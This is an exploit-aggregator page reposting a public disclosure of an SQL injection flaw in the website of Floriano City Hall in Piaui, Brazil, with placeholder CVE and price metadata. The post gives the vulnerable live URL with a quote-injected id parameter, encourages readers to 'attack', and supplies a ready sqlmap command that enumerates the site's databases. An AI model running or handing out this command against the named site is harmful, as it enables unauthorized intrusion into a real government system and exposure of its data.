Advertisement






Floriano - PI | SQL Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $1000 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-04-11
CPE
cpe:cpe:/a:floriano-pi:exploit:1.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040063

Below is a copy:

Floriano - PI | SQL Injection
hello friends, how are you?
I'm here to show you a flaw that I found at the Floriano City Hall, in Piaui, Brazil.

Hacker: uRomulou
Website: https://www.floriano.pi.gov.br/
Vulnerability: SQL Injection Method GET

concept proof

1 . go to the site with the vulnerability >> https://www.floriano.pi.gov.br/galeria.php?id=5%27
2 . will not return errors, as sql failures do not always return errors.
3. and attack! you can use tools like sqlmap or others.

an example using sqlmap : sqlmap --random-agent --batch --url https://www.floriano.pi.gov.br/galeria.php?id=5 --dbs

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.